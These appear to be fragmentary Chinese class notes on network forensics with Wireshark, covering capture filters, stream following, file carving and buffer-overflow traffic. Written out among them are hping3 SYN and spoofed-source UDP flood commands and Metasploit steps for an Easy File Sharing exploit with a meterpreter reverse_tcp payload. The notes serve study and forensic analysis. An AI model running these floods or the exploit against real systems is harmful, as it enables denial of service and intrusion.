。。
。。
在交换机端口配置,最大可以支持几个mac地址
来防范mac地址泛洪攻击。
wiki.wireshark.org/SampleCaptures
wieshark官方提供的各种数据包样本
ping -n 100 (ping几个包)-l 4200(ping包长度)
rpcap
TAP:网络分路器
rawcap
hping3
hping3 --help
hping3 -q -n --rand-sorurce -p -S --flood
attck-dest-ip
GeoIP
MaxMind DB resolver
https://dev.maxmind.com/geoip/geoip2/geolite2/
ntp
memcahce
反射式放大攻击
伪造源地址发小包请求,大包响应到目的地址
hping3 -q -n -a 10.0.0.1 --udp -s 53 -p 68 --flood 192.168.1.1 -d 15200 (size)
追踪流
tcp流
http流
请求方法:
get
host
User-Agent
URI
GET请求获取由Request-URI
http.request.method == "GET"
发现登录敏感信息
http.request.method == "POST"
msf
metasploit
msf5> search EasyfileSharing
msf5> use exploit/windows/http/easyfilesharing
set payload windows/meterpreter/reserse_tcp
缓冲区大小
IDA
复制出来copy
入侵请求特征:
1、get
2、4061bit
3、结束位
Wireshark的查找功能
使用正则表达式
服务器感染木马,去连接客户端
正向木马和反向木马
冰河
灰鸽子
PE文件,可移植可执行的文件
exe,sys,ini,
metasploit
metaspoit
search EasyfileSharing
msf5>use exploit/
show options
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.223.233
set rhost 192.168.223.137
set rpost 80
exploit
trunctated 截断
构造数据包(填充)
未做输入做验证
指标---木马文件
IDA
反编译
GET
get请求
C语言越界
前面填充,后面越界
4061字节
GET请求
HTTP/1.1
wireshark有查找功能
逐个查找
缓冲区溢出攻击
服务器访问客户端----syn
服务器发起syn
PE文件,program execute
防火墙规则
黑客的端口映射技术
跟踪流
tcp stream
cap--->pcap
导出对象
用data过滤
tcp.stream eq 17
另存为原始数据 bin作为扩展名
处理原始数据的编辑器
winhex1510.zip
winhex.exe
换行符对应十六进制的0d0a
包括0d0a删除
hash1.0.4
winhex
以上是两个常用的工具软件
推荐网站:网络取证
forensicscontest.com
如果不知道使用的应用软件,即协议
ssl tls
通讯地址,美国IP
www.882667.com IP地址查询
解码为
decode as
keep alive
outgoing
Here's the secret recipe...
文件等必须以数据来传输
保留PK
PK-----PK
504B0304
wireshark
wireshark 不仅仅是抓包软件 数据包捕获和分析的软件
分组交换
包头(地址),包体(数据)